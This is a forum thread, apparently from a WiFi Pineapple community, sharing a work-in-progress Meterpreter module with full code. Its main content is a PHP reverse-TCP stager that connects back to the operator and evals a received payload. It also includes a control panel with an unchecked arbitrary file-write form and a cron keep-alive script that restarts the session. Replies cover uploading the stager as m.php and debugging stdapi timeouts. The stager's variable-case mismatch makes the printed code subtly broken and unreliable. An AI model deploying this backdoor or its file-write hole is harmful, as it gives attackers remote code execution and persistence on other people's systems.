Jump to content

Mk4 Meterpreter Module Wip


Recommended Posts

So I've been working on a meterpreter module and it's 6:00 here so I figured I'd post my work-in-progress.

Here's a screenshot of it in action using armitage / cobalt strike (front-end for metasploit):

nVIbg.jpg

And here's a pic of the module WIP:

SsGa7.png

It's based off the PHP Meterpreter. To test it launch msf console and use the php/meterpreter_reverse_tcp payload.

Or from BT5 R2 start Armitage, hit Yes to start MSF and give it a minute, then from the tree in the top left double-click payload > php > meterpreter_reverse_tcp - set your IP and Port and launch.

Then on the pineapple from a shell issue "php tt.php" ensuring that the first few lines of tt.php reference said IP and port.

Here's the php meterpreter:

<?php

error_reporting(0);
# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.
$ip = '172.16.42.42';
$port = 4445;
$ipf = AF_INET;

if (FALSE !== strpos($ip, ":")) {
	# ipv6 requires brackets around the address
	$ip = "[". $ip ."]";
	$ipf = AF_INET6;
}

if (($f = 'stream_socket_client') && is_callable($f)) {
	$s = $f("tcp://{$ip}:{$port}");
	$s_type = 'stream';
} elseif (($f = 'fsockopen') && is_callable($f)) {
	$s = $f($ip, $port);
	$s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
	$s = $f($ipf, SOCK_STREAM, SOL_TCP);
	$res = @socket_connect($s, $ip, $port);
	if (!$res) { die(); }
	$s_type = 'socket';
} else {
	die('no socket funcs');
}
if (!$s) { die('no socket'); }

switch ($s_type) { 
case 'stream': $len = fread($s, 4); break;
case 'socket': $len = socket_read($s, 4); break;
}
if (!$len) {
	# We failed on the main socket.  There's no way to continue, so
	# bail
	die();
}
$a = unpack("Nlen", $len);
$len = $a['len'];

$b = '';
while (strlen($B) < $len) {
	switch ($s_type) { 
	case 'stream': $b .= fread($s, $len-strlen($B)); break;
	case 'socket': $b .= socket_read($s, $len-strlen($B)); break;
	}
}

# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($B);
die();

?>

Just change IP and Port above to what you're using.

The biggest problem I've had with the module so far is getting it to fork properly. I've tried using "| at now" and even empty (not the greatest since it has a timeout). Even went as far as writing a meterpreter-keepalive.sh which would run by cron every minute. Here's the code:

meterpreter.php


<?php                                                                                                    

if(isset($_GET['start'])) {
	echo "<pre>Starting Meterpreter</pre>";
	exec("/www/pineapple/modules/meterpreter/fork-meterpreter.sh");

//	if (exec("ps aux | grep \"[s]tart-meterpreter.sh\"") == "") {
//		exec("empty -f -i /tmp/meterpreter.in -o /tmp/meterpreter.out -p /tmp/meterpreter.pid -L /tmp/meterpreter.log /www/pineapple/modules/meterpreter/start-meterpreter.sh");
//	} else {
//		echo "<pre><b>Meterpreter already running</b></pre>";
//	}
}

$filename = $_POST['filename'];                                                                          
$newdata = $_POST['newdata'];                                                                            

if ($newdata != "") { $newdata = ereg_replace(13,  "", $newdata);                                        
$fw = fopen($filename, 'w') or die('Could not open file!');                                             
$fb = fwrite($fw,stripslashes($newdata)) or die('Could not write to file');                             
fclose($fw);                                                                                            
$fileMessage = "Updated " . $filename . "<br /><br />";                                                 
} ?>


<html>
    <head>
    <title>Pineapple Control Center</title>
    <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
    <link rel="stylesheet" type="text/css" href="/pineapple/includes/styles.css" />
    <link rel="icon" href="/pineapple/favicon.ico" type="image/x-icon">
    <link rel="shortcut icon" href="/pineapple/favicon.ico" type="image/x-icon">
    </head>
<body>
<?php
include_once("/www/pineapple/includes/navbar.php");
?>
<br><br>
<center>
<table width="50%">
<tr><td>
<div class=news>
	<div class=moduleTitle><b>Configuration</b></div>
	<div class=moduleContent>
	Edit IP address and Port below to match that of your metasploit session.
	<?php                                                                                                                                                                                                               
	$filename = "/www/pineapple/modules/meterpreter/tt.php";
	$fh = fopen($filename, "r") or die("Could not open file!");
	$data = fread($fh, filesize($filename)) or die("Could not read file!");                                                                                                                                           
	fclose($fh);                                                                                                                                                                                                      
	echo "<form action='$_SERVER[php_self]' method= 'post' >                                                                                                                                                           
	<textarea name='newdata' rows='20' style='min-width:100%; background-color:black; color:white; border-style:dashed;'>$data</textarea>                                                                               
	<input type='hidden' name='filename' value='/www/pineapple/modules/meterpreter/tt.php'>
	<br><center><input type='submit' value='Update Meterpreter Script'>                                                                                                                                                                
	</form>";                                                                                                                                                                                                           
	?>       

	</div>

	<br>
	<div class=moduleTitle>Meterpreter Configuration</div>
	<div class=moduleContent>
	This keep alive script will restart the Meterpreter session if it drops connection.


	</div>
</td></tr></table></center>
</body>
</html>

meterpreter-keepalive.sh

#!/bin/sh
# -------------------------------------------------
# Simple keep alive script for meterpreter sessions
# -------------------------------------------------
logger "Meterpreter: Keep-Alive Script Executed"
if ! ( pidof php tt.php); then
	php /www/pineapple/modules/meterpreter/tt.php &
	logger "Meterpreter: Connection was down, restarted."
else
	logger "Meterpreter: Connection seems to be up."
fi

My code is rusty having taken a month or so off so I figured I'd post my work in progress. If started from a shell it works great. Just trying to pretty it up / packing it up.

Lemme know what you think. I'm going to go look at the sky or something having nothing to do with computers for a few hours. Sure it'll come to me then...

Link to comment
Share on other sites

Even more cool...is Darren now using a MAC?! Has Paul brought you over to the dark side (the cool side imho)?

Kidding aside, this looks like a great addition to the pineapple - I thinking bringing more and more metasploit into the fold only bolsters the pineapples e-rep - a lot of folks in the community now a days looks on wifi hacks as almost passé. This kind of metasploit integration will lend credence to the fact that wifi is a great attack vector and very much worth not looking over. Thanks Darren!

telot

Link to comment
Share on other sites

Hey guy's Armitage & Cobalt Strike, why is one expensive and for windows only and the other one is free lol? they look like they do the exact same job, not to mention they look identical, are there anyx major differences that justify spending the big bucks for Cobalt Strike?

Cheer's - Anton.

Link to comment
Share on other sites

  • 2 months later...

So I got this working sort of... I just uploaded the meterpreter.php exploit into the www directory and named it m.php

So when I browse to m.php I get my evil looking linux icon in Armitage and get my meterpreter session. However whenever I try to make a pivot or anything I get "loading scdapi. Try command again later" Anyone else have that issue?

Link to comment
Share on other sites

  • 5 weeks later...
  • 2 months later...

So I got this working sort of... I just uploaded the meterpreter.php exploit into the www directory and named it m.php

So when I browse to m.php I get my evil looking linux icon in Armitage and get my meterpreter session. However whenever I try to make a pivot or anything I get "loading scdapi. Try command again later" Anyone else have that issue?

I'm getting the same error. Thought it might be that metasploit just needs time to load stdapi, but looking at the console, the load is actually timing out. Am I missing something?

I did see that meterpreter comes back with a message as follows:

meterpreter> load stdapi

[*] Timed out waiting for command to completeLastly, the meterpreter.php file above contains the line: exec("/www/pineapple/modules/meterpreter/fork-meterpreter.sh");but the code for this file doesn't appear to be on this page like the others (e.g. meterpreter-keepalive.sh)

Edited by blkik
Link to comment
Share on other sites

  • 1 month later...
  • 2 months later...

is there any update regarding whats been discussed above?

I'm getting the same error. Thought it might be that metasploit just needs time to load stdapi, but looking at the console, the load is actually timing out. Am I missing something?

I did see that meterpreter comes back with a message as follows:

meterpreter> load stdapi [*] Timed out waiting for command to completeLastly, the meterpreter.php file above contains the line: exec("/www/pineapple/modules/meterpreter/fork-meterpreter.sh");but the code for this file doesn't appear to be on this page like the others (e.g. meterpreter-keepalive.sh)

Link to comment
Share on other sites

  • 3 months later...

Here's what Ive tried:

In armitage, when firing up the php/meterpreter/reverse_tcp attack, under advanced options I set AutoLoadStdApi = 0, so that i could load it myself and see what happens. Running the exploit worked just fined, got my pwnd Pineapple and meterpreter shell. So I typed "load stdapi" and it says "loading stdapi extension..."... and just sits there. Nothing happens. So I crack another shell and try it again, and it says "stdapi extension already loaded." Trying ping sweep or pivoting still yields the "loading stdapi. try command later" error.

I'm not to familiar with where the code is to dive in and try to figure this out, so any advice would be appreciated.

Thanks!

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...